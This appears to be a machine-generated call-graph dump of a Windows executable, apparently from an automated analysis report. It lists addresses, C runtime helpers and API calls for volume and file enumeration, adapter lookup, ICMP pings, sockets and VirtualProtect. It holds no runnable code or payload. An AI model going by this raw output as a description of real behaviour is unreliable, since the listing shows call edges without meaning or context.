___scrt_uninitialize_crt 7 API calls 13302->13310 13307 b0004c ___scrt_uninitialize_crt 8 API calls 13303->13307 13304->13306 13305->13306 13308 b003f1 13306->13308 13309 b0041b 13306->13309 13306->13317 13307->13306 13311 b003f8 13308->13311 13312 b0040f 13308->13312 13315 afa4ec __dosmaperr 14 API calls 13309->13315 13309->13317 13310->13306 13313 afa4ec __dosmaperr 14 API calls 13311->13313 13314 afa4b6 __dosmaperr 14 API calls 13312->13314 13316 b003fd 13313->13316 13314->13317 13318 b00433 13315->13318 13320 afa4d9 __dosmaperr 14 API calls 13316->13320 13317->13271 13319 afa4d9 __dosmaperr 14 API calls 13318->13319 13319->13317 13320->13317 13322 afd59d ___scrt_uninitialize_crt LeaveCriticalSection 13321->13322 13323 b00243 13322->13323 13323->13274 13325 aff8f2 ___scrt_is_nonwritable_in_current_image 13324->13325 13338 afd57a EnterCriticalSection 13325->13338 13327 aff901 13328 aff948 13327->13328 13339 afd651 13327->13339 13329 afa4ec __dosmaperr 14 API calls 13328->13329 13331 aff94d 13329->13331 13352 aff97c 13331->13352 13332 aff92d FlushFileBuffers 13332->13331 13333 aff939 13332->13333 13335 afa4d9 __dosmaperr 14 API calls 13333->13335 13337 aff93e GetLastError 13335->13337 13337->13328 13338->13327 13340 afd65e 13339->13340 13341 afd673 13339->13341 13342 afa4d9 __dosmaperr 14 API calls 13340->13342 13343 afa4d9 __dosmaperr 14 API calls 13341->13343 13345 afd698 13341->13345 13344 afd663 13342->13344 13346 afd6a3 13343->13346 13347 afa4ec __dosmaperr 14 API calls 13344->13347 13345->13332 13348 afa4ec __dosmaperr 14 API calls 13346->13348 13349 afd66b 13347->13349 13350 afd6ab 13348->13350 13349->13332 13351 afa42f pre_c_initialization 25 API calls 13350->13351 13351->13349 13353 afd59d ___scrt_uninitialize_crt LeaveCriticalSection 13352->13353 13354 aff965 13353->13354 13354->13249 13355->13225 13356->13211 13357 aee827 13358 aee853 SetFilePointerEx 13357->13358 13359 aee82c 13357->13359 13359->13358 13360 aee89a 13359->13360 13361 af4f26 13362 af4f37 __aullrem 13361->13362 13364 af4f41 13362->13364 13365 afa6ee 13362->13365 13366 afc2ce _free 14 API calls 13365->13366 13367 afa706 13366->13367 13367->13364 13368 afd825 13369 afd831 ___scrt_is_nonwritable_in_current_image 13368->13369 13380 afd39c EnterCriticalSection 13369->13380 13371 afd838 13381 afd4dc 13371->13381 13379 afd856 13405 afd87c 13379->13405 13380->13371 13382 afd4e8 ___scrt_is_nonwritable_in_current_image 13381->13382 13383 afd512 13382->13383 13384 afd4f1 13382->13384 13408 afd39c EnterCriticalSection 13383->13408 13386 afa4ec __dosmaperr 14 API calls 13384->13386 13387 afd4f6 13386->13387 13388 afa42f pre_c_initialization 25 API calls 13387->13388 13389 afd500 13388->13389 13389->13379 13394 afd6bb GetStartupInfoW 13389->13394 13390 afd54a 13416 afd571 13390->13416 13391 afd51e 13391->13390 13409 afd42c 13391->13409 13395 afd76c 13394->13395 13396 afd6d8 13394->13396 13400 afd771 13395->13400 13396->13395 13397 afd4dc 26 API calls 13396->13397 13398 afd700 13397->13398 13398->13395 13399 afd730 GetFileType 13398->13399 13399->13398 13401 afd778 13400->13401 13402 afd7bb GetStdHandle 13401->13402 13403 afd821 13401->13403 13404 afd7ce GetFileType 13401->13404 13402->13401 13403->13379 13404->13401 13425 afd3e4 LeaveCriticalSection 13405->13425 13407 afd867 13408->13391 13410 afc42c pre_c_initialization 14 API calls 13409->13410 13415 afd43e 13410->13415 13411 afd44b 13412 afc2ce _free 14 API calls 13411->13412 13413 afd4a0 13412->13413 13413->13391 13415->13411 13419 afe2dc 13415->13419 13424 afd3e4 LeaveCriticalSection 13416->13424 13418 afd578 13418->13389 13420 afe11a pre_c_initialization 5 API calls 13419->13420 13421 afe2f8 13420->13421 13422 afe316 InitializeCriticalSectionAndSpinCount 13421->13422 13423 afe301 13421->13423 13422->13423 13423->13415 13424->13418 13425->13407 13426 aea224 13427 aedec0 13426->13427 13428 aea233 GetDiskFreeSpaceExW 13427->13428 13429 aea25b 13428->13429 13430 aea248 13428->13430 13432 af7b30 _ValidateLocalCookies 5 API calls 13429->13432 13431 af7b30 _ValidateLocalCookies 5 API calls 13430->13431 13433 aea257 13431->13433 13434 aea26e 13432->13434 13435 aeb625 13436 aeb630 13435->13436 13437 aeb652 FindFirstFileW 13436->13437 13438 aeb66f 13437->13438 13442 aeb682 13437->13442 13439 af7b30 _ValidateLocalCookies 5 API calls 13438->13439 13440 aeb67e 13439->13440 13441 aeb7f9 13442->13441 13444 af6e20 13442->13444 13445 af6e2f 13444->13445 13446 af6e8a 13445->13446 13447 afa532 25 API calls 13445->13447 13446->13441 13448 af6ea4 13447->13448 13449 afa596 25 API calls 13448->13449 13450 af6eb7 13449->13450 13455 aee510 13450->13455 13452 af6f75 GetLastError 13453 af6f88 13452->13453 13453->13441 13454 af6ed7 13454->13452 13454->13453 13456 aee525 13455->13456 13457 aee552 13456->13457 13458 aee5a8 GetFileAttributesW 13456->13458 13457->13454 13458->13454 15418 aef322 15419 aef361 15418->15419 15420 aef385 socket 15419->15420 13459 af3722 13460 af372c 13459->13460 13461 aee070 6 API calls 13460->13461 13463 af383d 13461->13463 13462 af38ee GetLastError 13462->13463 13463->13462 13464 af3928 Sleep 13463->13464 13465 af3847 13463->13465 13464->13463 14980 ae5d3e 14981 ae5d47 14980->14981 14984 ae5d6b __allrem 14980->14984 14982 ae5d7c 14983 af7b30 _ValidateLocalCookies 5 API calls 14985 ae6fef 14983->14985 14984->14982 14986 aee380 ReadFile 14984->14986 14988 ae6341 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 14984->14988 14987 ae66c9 14986->14987 14987->14988 14989 aee380 ReadFile 14987->14989 14988->14983 14989->14988 13485 af7535 13486 af7569 Sleep 13485->13486 13487 aedec0 13485->13487 13488 af7599 13486->13488 13487->13486 13492 aefd0c 13493 aee070 6 API calls 13492->13493 13494 aefd3d 13492->13494 13493->13494 13498 aefd98 13494->13498 13499 af2440 13494->13499 13496 aefd86 13496->13498 13509 af31f0 13496->13509 13500 af2461 13499->13500 13501 aee070 6 API calls 13500->13501 13502 af255b 13501->13502 13503 af2567 13502->13503 13508 af257b 13502->13508 13504 af7b30 _ValidateLocalCookies 5 API calls 13503->13504 13506 af2577 13504->13506 13505 af7b30 _ValidateLocalCookies 5 API calls 13507 af2695 13505->13507 13506->13496 13507->13496 13508->13505 13512 af31f3 13509->13512 13510 af3486 GetLastError 13511 af3491 Sleep 13510->13511 13510->13512 13511->13512 13512->13510 13513 af33f4 13512->13513 13516 af34c5 13512->13516 13513->13498 13514 af7b30 _ValidateLocalCookies 5 API calls 13515 af369c 13514->13515 13515->13498 13516->13514 13517 af354c 13516->13517 13517->13498 14516 ae5409 14517 ae5418 14516->14517 14518 ae5483 14516->14518 14519 ae5c16 14518->14519 14521 ae5c2a 14518->14521 14522 ae5b6b 14518->14522 14520 af7b30 _ValidateLocalCookies 5 API calls 14519->14520 14523 ae5c26 14520->14523 14524 ae5cb6 14521->14524 14525 ae5c32 ___scrt_fastfail 14521->14525 14526 ae5b75 14522->14526 14528 ae5b89 14522->14528 14527 ae5ccf 14524->14527 14529 ae5cbb 14524->14529 14525->14527 14536 ae5ca2 14525->14536 14530 af7b30 _ValidateLocalCookies 5 API calls 14526->14530 14532 af7b30 _ValidateLocalCookies 5 API calls 14527->14532 14528->14519 14528->14527 14531 af7b30 _ValidateLocalCookies 5 API calls 14529->14531 14533 ae5b85 14530->14533 14534 ae5ccb 14531->14534 14535 ae5ce1 14532->14535 14537 af7b30 _ValidateLocalCookies 5 API calls 14536->14537 14538 ae5cb2 14537->14538 13544 aef51c 13545 aedec0 13544->13545 13546 aef54e IcmpSendEcho2 13545->13546 13547 aeb31c 13548 aee070 6 API calls 13547->13548 13549 aeb32a 13548->13549 13550 afa532 25 API calls 13549->13550 13553 aeb34d 13549->13553 13550->13553 13551 af7b30 _ValidateLocalCookies 5 API calls 13552 aeb3db 13551->13552 13553->13551 13568 ae541b 13569 ae5456 13568->13569 13570 ae5c16 13569->13570 13572 ae5c2a 13569->13572 13573 ae5b6b 13569->13573 13571 af7b30 _ValidateLocalCookies 5 API calls 13570->13571 13574 ae5c26 13571->13574 13575 ae5cb6 13572->13575 13576 ae5c32 ___scrt_fastfail 13572->13576 13577 ae5b75 13573->13577 13579 ae5b89 13573->13579 13578 ae5ccf 13575->13578 13580 ae5cbb 13575->13580 13576->13578 13587 ae5ca2 13576->13587 13581 af7b30 _ValidateLocalCookies 5 API calls 13577->13581 13583 af7b30 _ValidateLocalCookies 5 API calls 13578->13583 13579->13570 13579->13578 13582 af7b30 _ValidateLocalCookies 5 API calls 13580->13582 13584 ae5b85 13581->13584 13585 ae5ccb 13582->13585 13586 ae5ce1 13583->13586 13588 af7b30 _ValidateLocalCookies 5 API calls 13587->13588 13589 ae5cb2 13588->13589 13590 ae2216 13591 ae21c0 13590->13591 13592 ae23f6 13591->13592 13595 ae21f0 13591->13595 13604 ae1e50 13591->13604 13593 af7b30 _ValidateLocalCookies 5 API calls 13592->13593 13594 ae2408 13593->13594 13596 ae240c 13598 af7b30 _ValidateLocalCookies 5 API calls 13596->13598 13597 ae2372 13600 af7b30 _ValidateLocalCookies 5 API calls 13597->13600 13602 ae242d 13598->13602 13599 afa1c0 25 API calls 13599->13604 13601 ae238f 13600->13601 13603 ae1e87 GetProcAddress 13603->13604 13604->13596 13604->13597 13604->13599 13604->13603 13605 af4415 13611 af51d0 13605->13611 13607 af4495 13608 af7b30 _ValidateLocalCookies 5 API calls 13607->13608 13610 af44c6 13607->13610 13609 af44c2 13608->13609 13612 af51f7 13611->13612 13613 af53a3 13612->13613 13616 af53b7 13612->13616 13614 af7b30 _ValidateLocalCookies 5 API calls 13613->13614 13615 af53b3 13614->13615 13615->13607 13617 af544e 13616->13617 13620 af5464 ___scrt_fastfail 13616->13620 13618 af7b30 _ValidateLocalCookies 5 API calls 13617->13618 13619 af5460 13618->13619 13619->13607 13621 af549d 13620->13621 13622 af54b3 13620->13622 13623 af7b30 _ValidateLocalCookies 5 API calls 13621->13623 13624 aee070 6 API calls 13622->13624 13625 af54af 13623->13625 13626 af54c3 13624->13626 13625->13607 13627 af54e8 ___scrt_fastfail 13626->13627 13628 af54d2 13626->13628 13631 aee070 6 API calls 13627->13631 13629 af7b30 _ValidateLocalCookies 5 API calls 13628->13629 13630 af54e4 13629->13630 13630->13607 13632 af550d 13631->13632 13633 af5538 13632->13633 13634 af5517 13632->13634 13635 aee070 6 API calls 13633->13635 13637 af7b30 _ValidateLocalCookies 5 API calls 13634->13637 13636 af5545 13635->13636 13638 af554f 13636->13638 13642 af5570 ___scrt_fastfail 13636->13642 13639 af5534 13637->13639 13640 af7b30 _ValidateLocalCookies 5 API calls 13638->13640 13639->13607 13641 af556c 13640->13641 13641->13607 13643 af7b30 _ValidateLocalCookies 5 API calls 13642->13643 13644 af587f 13643->13644 13644->13607 13645 af7d15 13650 af83f1 SetUnhandledExceptionFilter 13645->13650 13647 af7d1a pre_c_initialization 13651 afb306 13647->13651 13649 af7d25 13650->13647 13652 afb32c 13651->13652 13653 afb312 13651->13653 13652->13649 13653->13652 13654 afa4ec __dosmaperr 14 API calls 13653->13654 13655 afb31c 13654->13655 13656 afa42f pre_c_initialization 25 API calls 13655->13656 13657 afb327 13656->13657 13657->13649 13658 aee212 13659 aedec0 13658->13659 13660 aee223 FindClose 13659->13660 13661 ae496f 13662 aedec0 13661->13662 13663 ae498b ReadFile 13662->13663 13664 ae49a1 13663->13664 13667 ae49b5 13663->13667 13665 af7b30 _ValidateLocalCookies 5 API calls 13664->13665 13666 ae49b1 13665->13666 13668 af7b30 _ValidateLocalCookies 5 API calls 13667->13668 13669 ae4a47 13667->13669 13670 ae4a43 13668->13670 15038 af356d 15039 af3540 15038->15039 15040 af354c 15039->15040 15041 af7b30 _ValidateLocalCookies 5 API calls 15039->15041 15042 af369c 15041->15042 14573 af7c62 14574 af7c6a pre_c_initialization 14573->14574 14590 afb1c0 14574->14590 14576 af7c75 pre_c_initialization 14597 af7f79 14576->14597 14578 af825e ___scrt_fastfail 4 API calls 14580 af7d0c ___scrt_initialize_default_local_stdio_options 14578->14580 14579 af7c8a __RTC_Initialize 14588 af7ce7 pre_c_initialization 14579->14588 14603 af8132 14579->14603 14582 af7ca3 pre_c_initialization 14582->14588 14606 af81ec InitializeSListHead 14582->14606 14584 af7cb9 pre_c_initialization 14607 af81fb 14584->14607 14586 af7cdc pre_c_initialization 14613 afb29d 14586->14613 14588->14578 14589 af7d04 14588->14589 14591 afb1cf 14590->14591 14592 afb1f2 14590->14592 14591->14592 14593 afa4ec __dosmaperr 14 API calls 14591->14593 14592->14576 14594 afb1e2 14593->14594 14595 afa42f pre_c_initialization 25 API calls 14594->14595 14596 afb1ed 14595->14596 14596->14576 14598 af7f8c 14597->14598 14599 af7f88 14597->14599 14600 af825e ___scrt_fastfail 4 API calls 14598->14600 14602 af7f99 pre_c_initialization ___scrt_release_startup_lock 14598->14602 14599->14579 14601 af801d 14600->14601 14602->14579 14620 af80f7 14603->14620 14606->14584 14683 afb7d0 14607->14683 14609 af820c 14610 af8213 14609->14610 14611 af825e ___scrt_fastfail 4 API calls 14609->14611 14610->14586 14612 af821b 14611->14612 14612->14586 14614 afbf33 pre_c_initialization 37 API calls 14613->14614 14615 afb2a8 14614->14615 14616 afa4ec __dosmaperr 14 API calls 14615->14616 14619 afb2e0 14615->14619 14617 afb2d5 14616->14617 14618 afa42f pre_c_initialization 25 API calls 14617->14618 14618->14619 14619->14588 14621 af811b 14620->14621 14622 af8114 14620->14622 14629 afb660 14621->14629 14626 afb5f4 14622->14626 14625 af8119 14625->14582 14627 afb660 __onexit 28 API calls 14626->14627 14628 afb606 14627->14628 14628->14625 14632 afb396 14629->14632 14633 afb3a2 ___scrt_is_nonwritable_in_current_image 14632->14633 14640 afd39c EnterCriticalSection 14633->14640 14635 afb3b0 14641 afb3f1 14635->14641 14637 afb3bd 14651 afb3e5 14637->14651 14640->14635 14642 afb40d 14641->14642 14644 afb484 pre_c_initialization __crt_fast_encode_pointer 14641->14644 14643 afb464 14642->14643 14642->14644 14654 afe416 14642->14654 14643->14644 14646 afe416 __onexit 28 API calls 14643->14646 14644->14637 14648 afb47a 14646->14648 14647 afb45a 14649 afc2ce _free 14 API calls 14647->14649 14650 afc2ce _free 14 API calls 14648->14650 14649->14643 14650->14644 14682 afd3e4 LeaveCriticalSection 14651->14682 14653 afb3ce 14653->14625 14655 afe43e 14654->14655 14656 afe423 14654->14656 14658 afe44d 14655->14658 14663 aff84a 14655->14663 14656->14655 14657 afe42f 14656->14657 14659 afa4ec __dosmaperr 14 API calls 14657->14659 14670 aff87d 14658->14670 14662 afe434 ___scrt_fastfail 14659->14662 14662->14647 14664 aff86a HeapSize 14663->14664 14665 aff855 14663->14665 14664->14658 14666 afa4ec __dosmaperr 14 API calls 14665->14666 14667 aff85a 14666->14667 14668 afa42f pre_c_initialization 25 API calls 14667->14668 14669 aff865 14668->14669 14669->14658 14671 aff88a 14670->14671 14672 aff895 14670->14672 14673 afc308 __onexit 15 API calls 14671->14673 14674 aff89d 14672->14674 14680 aff8a6 pre_c_initialization 14672->14680 14678 aff892 14673->14678 14675 afc2ce _free 14 API calls 14674->14675 14675->14678 14676 aff8ab 14679 afa4ec __dosmaperr 14 API calls 14676->14679 14677 aff8d0 HeapReAlloc 14677->14678 14677->14680 14678->14662 14679->14678 14680->14676 14680->14677 14681 afe546 pre_c_initialization 2 API calls 14680->14681 14681->14680 14682->14653 14684 afb7ee pre_c_initialization 14683->14684 14685 afb80e pre_c_initialization 14683->14685 14686 afa4ec __dosmaperr 14 API calls 14684->14686 14685->14609 14687 afb804 14686->14687 14688 afa42f pre_c_initialization 25 API calls 14687->14688 14688->14685 15057 aee160 15058 aee135 15057->15058 15059 aee165 15057->15059 15060 aee1a2 VirtualFree 15059->15060 15061 aee169 15059->15061 13747 af717e 13749 af718f 13747->13749 13748 af719b FindCloseChangeNotification 13748->13749 13749->13748 13750 af71eb 13749->13750 13751 af1a7d 13752 aedec0 13751->13752 13753 af1aad GetAdaptersInfo 13752->13753 13754 af1abf 13753->13754 13756 af1ad3 13753->13756 13755 af7b30 _ValidateLocalCookies 5 API calls 13754->13755 13757 af1acf 13755->13757 13787 ae187a 13788 ae1885 13787->13788 13790 ae1a63 13788->13790 13796 aeea50 13788->13796 13791 af7b30 _ValidateLocalCookies 5 API calls 13790->13791 13792 ae1ab4 13791->13792 13793 ae18b5 13794 ae1a3f 13793->13794 13795 ae1a59 FindCloseChangeNotification 13793->13795 13795->13790 13798 aeea1e 13796->13798 13797 aeea87 13798->13797 13799 aeea37 VirtualProtect 13798->13799 13799->13793 13800 aee47b 13801 aedec0 13800->13801 13802 aee492 FindCloseChangeNotification 13801->13802 13870 ae2f76 13871 ae33e3 13870->13871 13872 aee070 6 API calls 13871->13872 13873 ae357f 13872->13873 13874 ae35b2 13873->13874 13880 ae35c6 __aulldiv __aullrem ___scrt_fastfail 13873->13880 13875 af7b30 _ValidateLocalCookies 5 API calls 13874->13875 13876 ae35c2 13875->13876 13877 ae37fe __aullrem 13878 af7b30 _ValidateLocalCookies 5 API calls 13877->13878 13879 ae47eb 13878->13879 13880->13877 13880->13880 13882 ae2ea0 13880->13882 13885 ae2ea7 ___scrt_fastfail 13882->13885 13883 afa4ec __dosmaperr 14 API calls 13886 ae2ed1 13883->13886 13884 ae2eb3 ___scrt_uninitialize_crt 13884->13877 13885->13883 13885->13884 13887 afa42f pre_c_initialization 25 API calls 13886->13887 13888 ae2edc 13887->13888 13888->13877 15244 afb276 15247 afb1fd 15244->15247 15248 afb209 ___scrt_is_nonwritable_in_current_image 15247->15248 15255 afd39c EnterCriticalSection 15248->15255 15250 afb241 15256 afb25f 15250->15256 15251 afb213 15251->15250 15253 afdfcf __fassign 14 API calls 15251->15253 15253->15251 15255->15251 15259 afd3e4 LeaveCriticalSection 15256->15259 15258 afb24d 15259->15258 13889 aea472 13890 aea489 FindFirstVolumeW 13889->13890 13893 aea475 13889->13893 13892 aea4b0 13890->13892 13891 aea43f 13892->13892 13894 aea4bc 13892->13894 13898 aea4d1 13892->13898 13893->13890 13893->13891 13895 af7b30 _ValidateLocalCookies 5 API calls 13894->13895 13896 aea4ca 13895->13896 13897 aea567 GetDriveTypeW 13897->13898 13899 aea5a1 13897->13899 13898->13897 13898->13899 13900 aff770 13903 afcec3 13900->13903 13904 afcecc 13903->13904 13905 afcefe 13903->13905 13909 afbff0 13904->13909 13910 afbffb 13909->13910 13911 afc001 13909->13911 13912 afe25b pre_c_initialization 6 API calls 13910->13912 13913 afe29a pre_c_initialization 6 API calls 13911->13913 13933 afc007 13911->13933 13912->13911 13914 afc01b 13913->13914 13915 afc42c pre_c_initialization 14 API calls 13914->13915 13914->13933 13918 afc02b 13915->13918 13916 afb86b pre_c_initialization 37 API calls 13917 afc089 13916->13917 13919 afc048 13918->13919 13920 afc033 13918->13920 13922 afe29a pre_c_initialization 6 API calls 13919->13922 13923 afe29a pre_c_initialization 6 API calls 13920->13923 13921 afc080 13934 afcd0a 13921->13934 13924 afc054 13922->13924 13925 afc03f 13923->13925 13926 afc058 13924->13926 13927 afc067 13924->13927 13930 afc2ce _free 14 API calls 13925->13930 13928 afe29a pre_c_initialization 6 API calls 13926->13928 13929 afbd61 pre_c_initialization 14 API calls 13927->13929 13928->13925 13931 afc072 13929->13931 13930->13933 13932 afc2ce _free 14 API calls 13931->13932 13932->13933 13933->13916 13933->13921 13953 afce23 13934->13953 13939 afcd36 13939->13905 13940 afc308 __onexit 15 API calls 13941 afcd47 13940->13941 13949 afcd79 13941->13949 13971 afcf1e 13941->13971 13944 afc2ce _free 14 API calls 13947 afcd87 13944->13947 13945 afcd8f 13950 afc2ce _free 14 API calls 13945->13950 13951 afcdbb 13945->13951 13946 afcd74 13948 afa4ec __dosmaperr 14 API calls 13946->13948 13947->13905 13948->13949 13949->13944 13950->13951 13951->13949 13982 afc9a5 13951->13982 13954 afce2f ___scrt_is_nonwritable_in_current_image 13953->13954 13960 afce49 13954->13960 13990 afd39c EnterCriticalSection 13954->13990 13956 afce59 13962 afc2ce _free 14 API calls 13956->13962 13963 afce85 13956->13963 13957 afcd1d 13964 afcab3 13957->13964 13959 afb86b pre_c_initialization 37 API calls 13961 afcec2 13959->13961 13960->13957 13960->13959 13962->13963 13991 afcea2 13963->13991 13995 af9ed4 13964->13995 13967 afcae6 13969 afcafd 13967->13969 13970 afcaeb GetACP 13967->13970 13968 afcad4 GetOEMCP 13968->13969 13969->13939 13969->13940 13970->13969 13972 afcab3 39 API calls 13971->13972 13973 afcf3e 13972->13973 13975 afcf78 IsValidCodePage 13973->13975 13980 afcfb4 ___scrt_fastfail 13973->13980 13974 af7b30 _ValidateLocalCookies 5 API calls 13976 afcd6c 13974->13976 13977 afcf8a 13975->13977 13975->13980 13976->13945 13976->13946 13978 afcfb9 GetCPInfo 13977->13978 13981 afcf93 ___scrt_fastfail 13977->13981 13978->13980 13978->13981 13980->13974 13980->13980 14038 afcb89 13981->14038 13983 afc9b1 ___scrt_is_nonwritable_in_current_image 13982->13983 14125 afd39c EnterCriticalSection 13983->14125 13985 afc9bb 14126 afc9f2 13985->14126 13990->13956 13994 afd3e4 LeaveCriticalSection 13991->13994 13993 afcea9 13993->13960 13994->13993 13996 af9ef4 13995->13996 13997 af9eeb 13995->13997 13996->13997 13998 afbf33 pre_c_initialization 37 API calls 13996->13998 13997->13967 13997->13968 13999 af9f14 13998->13999 14003 afc185 13999->14003 14004 af9f2a 14003->14004 14005 afc198 14003->14005 14007 afc1b2 14004->14007 14005->14004 14011 afdf4e 14005->14011 14008 afc1da 14007->14008 14009 afc1c5 14007->14009 14008->13997 14009->14008 14033 afcf0b 14009->14033 14012 afdf5a ___scrt_is_nonwritable_in_current_image 14011->14012 14013 afbf33 pre_c_initialization 37 API calls 14012->14013 14014 afdf63 14013->14014 14015 afdfa9 14014->14015 14024 afd39c EnterCriticalSection 14014->14024 14015->14004 14017 afdf81 14025 afdfcf 14017->14025 14022 afb86b pre_c_initialization 37 API calls 14023 afdfce 14022->14023 14024->14017 14026 afdfdd pre_c_initialization 14025->14026 14028 afdf92 14025->14028 14027 afdd02 pre_c_initialization 14 API calls 14026->14027 14026->14028 14027->14028 14029 afdfae 14028->14029 14032 afd3e4 LeaveCriticalSection 14029->14032 14031 afdfa5 14031->14015 14031->14022 14032->14031 14034 afbf33 pre_c_initialization 37 API calls 14033->14034 14035 afcf15 14034->14035 14036 afce23 __fassign 37 API calls 14035->14036 14037 afcf1b 14036->14037 14037->14008 14039 afcbb1 GetCPInfo 14038->14039 14040 afcc7a 14038->14040 14039->14040 14046 afcbc9 14039->14046 14041 af7b30 _ValidateLocalCookies 5 API calls 14040->14041 14043 afcd08 14041->14043 14043->13980 14049 afdb82 14046->14049 14048 afbb8c 42 API calls 14048->14040 14050 af9ed4 __fassign 37 API calls 14049->14050 14051 afdba2 14050->14051 14069 afd1ab 14051->14069 14053 afdc60 14054 af7b30 _ValidateLocalCookies 5 API calls 14053->14054 14057 afcc31 14054->14057 14055 afdbcf 14055->14053 14056 afc308 __onexit 15 API calls 14055->14056 14060 afdbf5 ___scrt_fastfail 14055->14060 14056->14060 14064 afbb8c 14057->14064 14058 afdc5a 14072 afbbd5 14058->14072 14060->14058 14061 afd1ab __fassign MultiByteToWideChar 14060->14061 14062 afdc43 14061->14062 14062->14058 14063 afdc4a GetStringTypeW 14062->14063 14063->14058 14065 af9ed4 __fassign 37 API calls 14064->14065 14066 afbb9f 14065->14066 14076 afb9a2 14066->14076 14071 afd1bc MultiByteToWideChar 14069->14071 14071->14055 14073 afbbf2 14072->14073 14074 afbbe1 14072->14074 14073->14053 14074->14073 14075 afc2ce _free 14 API calls 14074->14075 14075->14073 14077 afb9bd 14076->14077 14078 afd1ab __fassign MultiByteToWideChar 14077->14078 14082 afba01 14078->14082 14079 afbb66 14080 af7b30 _ValidateLocalCookies 5 API calls 14079->14080 14081 afbb79 14080->14081 14081->14048 14082->14079 14083 afc308 __onexit 15 API calls 14082->14083 14086 afba26 14082->14086 14083->14086 14084 afbacb 14088 afbbd5 __freea 14 API calls 14084->14088 14085 afd1ab __fassign MultiByteToWideChar 14087 afba6c 14085->14087 14086->14084 14086->14085 14087->14084 14104 afe327 14087->14104 14088->14079 14091 afbada 14095 afc308 __onexit 15 API calls 14091->14095 14098 afbaec 14091->14098 14092 afbaa2 14092->14084 14094 afe327 7 API calls 14092->14094 14093 afbb57 14097 afbbd5 __freea 14 API calls 14093->14097 14094->14084 14095->14098 14096 afe327 7 API calls 14099 afbb34 14096->14099 14097->14084 14098->14093 14098->14096 14099->14093 14113 afd227 14099->14113 14101 afbb4e 14101->14093 14102 afbb83 14101->14102 14103 afbbd5 __freea 14 API calls 14102->14103 14103->14084 14116 afe01f 14104->14116 14107 afe35f 14119 afe384 14107->14119 14108 afe338 LCMapStringEx 14112 afba8e 14108->14112 14111 afe378 LCMapStringW 14111->14112 14112->14084 14112->14091 14112->14092 14115 afd240 WideCharToMultiByte 14113->14115 14115->14101 14117 afe11a pre_c_initialization 5 API calls 14116->14117 14118 afe035 14117->14118 14118->14107 14118->14108 14122 afe039 14119->14122 14121 afe38f 14121->14111 14123 afe11a pre_c_initialization 5 API calls 14122->14123 14124 afe04f 14123->14124 14124->14121 14125->13985 14136 afd111 14126->14136 14128 afca14 14129 afd111 25 API calls 14128->14129 14130 afca33 14129->14130 14131 afc9c8 14130->14131 14132 afc2ce _free 14 API calls 14130->14132 14133 afc9e6 14131->14133 14132->14131 14150 afd3e4 LeaveCriticalSection 14133->14150 14135 afc9d4 14135->13949 14137 afd122 14136->14137 14145 afd11e ___scrt_uninitialize_crt 14136->14145 14138 afd129 14137->14138 14141 afd13c ___scrt_fastfail 14137->14141 14139 afa4ec __dosmaperr 14 API calls 14138->14139 14140 afd12e 14139->14140 14142 afa42f pre_c_initialization 25 API calls 14140->14142 14143 afd16a 14141->14143 14144 afd173 14141->14144 14141->14145 14142->14145 14146 afa4ec __dosmaperr 14 API calls 14143->14146 14144->14145 14148 afa4ec __dosmaperr 14 API calls 14144->14148 14145->14128 14147 afd16f 14146->14147 14149 afa42f pre_c_initialization 25 API calls 14147->14149 14148->14147 14149->14145 14150->14135 14151 af3c4e 14152 aedec0 14151->14152 14153 af3c76 connect 14152->14153 14154 af3bce 14153->14154 14155 af3c8a 14153->14155 14156 af7b30 _ValidateLocalCookies 5 API calls 14154->14156 14157 af3bdd 14156->14157 14188 aebb4d 14189 aedec0 14188->14189 14190 aebb72 FindNextFileW 14189->14190 14191 aebb90 14190->14191 14195 aeb6c0 14190->14195 14192 af7b30 _ValidateLocalCookies 5 API calls 14191->14192 14193 aebba9 14192->14193 14194 aeb7f9 14195->14194 14196 af6e20 27 API calls 14195->14196 14196->14194 15266 ae1a44 15267 aedec0 15266->15267 15268 ae1a5b FindCloseChangeNotification 15267->15268 15269 ae1a63 15268->15269 15270 af7b30 _ValidateLocalCookies 5 API calls 15269->15270 15271 ae1ab4 15270->15271 14718 afec41 14719 afeb70 ___scrt_uninitialize_crt 66 API calls 14718->14719 14720 afec49 14719->14720 14728 b00452 14720->14728 14722 afec4e 14738 b004fd 14722->14738 14725 afec78 14726 afc2ce _free 14 API calls 14725->14726 14727 afec83 14726->14727 14729 b0045e ___scrt_is_nonwritable_in_current_image 14728->14729 14742 afd39c EnterCriticalSection 14729->14742 14731 b00469 14732 b004d5 14731->14732 14735 b004a9 DeleteCriticalSection 14731->14735 14743 b0097d 14731->14743 14756 b004f4 14732->14756 14736 afc2ce _free 14 API calls 14735->14736 14736->14731 14739 b00514 14738->14739 14740 afec5d DeleteCriticalSection 14738->14740 14739->14740 14741 afc2ce _free 14 API calls 14739->14741 14740->14722 14740->14725 14741->14740 14742->14731 14744 b00989 ___scrt_is_nonwritable_in_current_image 14743->14744 14745 b00993 14744->14745 14746 b009a8 14744->14746 14747 afa4ec __dosmaperr 14 API calls 14745->14747 14752 b009a3 14746->14752 14759 afec8d EnterCriticalSection 14746->14759 14748 b00998 14747->14748 14750 afa42f pre_c_initialization 25 API calls 14748->14750 14750->14752 14751 b009c5 14760 b00906 14751->14760 14752->14731 14754 b009d0 14776 b009f7 14754->14776 14840 afd3e4 LeaveCriticalSection 14756->14840 14758 b004e1 14758->14722 14759->14751 14761 b00913 14760->14761 14762 b00928 14760->14762 14763 afa4ec __dosmaperr 14 API calls 14761->14763 14764 afeac3 ___scrt_uninitialize_crt 62 API calls 14762->14764 14767 b00923 14762->14767 14765 b00918 14763->14765 14768 b0093d 14764->14768 14766 afa42f pre_c_initialization 25 API calls 14765->14766 14766->14767 14767->14754 14769 b004fd 14 API calls 14768->14769 14770 b00945 14769->14770 14771 aff257 ___scrt_uninitialize_crt 25 API calls 14770->14771 14772 b0094b 14771->14772 14779 b00f77 14772->14779 14775 afc2ce _free 14 API calls 14775->14767 14839 afeca1 LeaveCriticalSection 14776->14839 14778 b009ff 14778->14752 14780 b00f88 14779->14780 14781 b00f9d 14779->14781 14782 afa4d9 __dosmaperr 14 API calls 14780->14782 14783 b00fe6 14781->14783 14786 b00fc4 14781->14786 14785 b00f8d 14782->14785 14784 afa4d9 __dosmaperr 14 API calls 14783->14784 14787 b00feb 14784->14787 14788 afa4ec __dosmaperr 14 API calls 14785->14788 14794 b00eeb 14786->14794 14790 afa4ec __dosmaperr 14 API calls 14787->14790 14791 b00951 14788->14791 14792 b00ff3 14790->14792 14791->14767 14791->14775 14793 afa42f pre_c_initialization 25 API calls 14792->14793 14793->14791 14795 b00ef7 